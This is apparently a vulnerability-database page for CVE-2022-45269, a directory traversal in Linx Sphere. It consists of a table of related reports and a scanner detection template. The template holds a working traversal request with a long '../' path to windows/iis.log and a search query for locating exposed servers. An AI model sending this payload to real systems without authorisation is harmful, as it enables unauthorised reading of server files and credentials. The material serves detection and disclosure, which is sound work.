| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2022-45269 | 13 Dec 202202:21 | β | circl | |
| GMAO LINX LINX Sphere θ·―εΎιεζΌζ΄ | 12 Dec 202200:00 | β | cnnvd | |
| CVE-2022-45269 | 12 Dec 202200:00 | β | cve | |
| CVE-2022-45269 | 12 Dec 202200:00 | β | cvelist | |
| CVE-2022-45269 | 12 Dec 202223:15 | β | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 201700:00 | β | openvas | |
| Directory traversal | 12 Dec 202223:15 | β | prion | |
| PT-2022-27452 Β· Linx Β· Linx Sphere Linx | 12 Dec 202200:00 | β | ptsecurity | |
| CVE-2022-45269 | 23 May 202500:16 | β | redhatcve | |
| CVE-2022-45269 | 12 Dec 202200:00 | β | vulnrichment |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2022-45269 |
id: CVE-2022-45269
info:
name: Linx Sphere - Directory Traversal
author: robotshell
severity: high
description: |
A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.
impact: |
Unauthenticated attackers can exploit path traversal to read arbitrary files from the server, potentially accessing sensitive configuration files, credentials, and application source code.
remediation: |
Update Linx Sphere to a version newer than 7.35.ST15 that properly validates file paths and prevents directory traversal attacks.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-45269
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-45269
cwe-id: CWE-22
epss-score: 0.03092
epss-percentile: 0.86135
cpe: cpe:2.3:a:gmaolinx:linx_sphere:7.35.st15:*:*:*:*:*:*:*
metadata:
vendor: gmaolinx
product: linx_sphere
fofa-query: "SCS.Web.Server.SPI/1.0"
verified: true
max-request: 1
tags: cve,cve2022,linx,lfi,scs,vuln
http:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../windows/iis.log"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Component Based Setup"
- type: status
status:
- 200
# digest: 4a0a004730450220015b8bc59f9cdda0b7533f5a4b0864d0020b3d120f9e6f03115b845577108278022100f61cea5c1977ec8de7d2df1e578d111ce3ff5a70c865f5303ba5368ac4f3c78f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation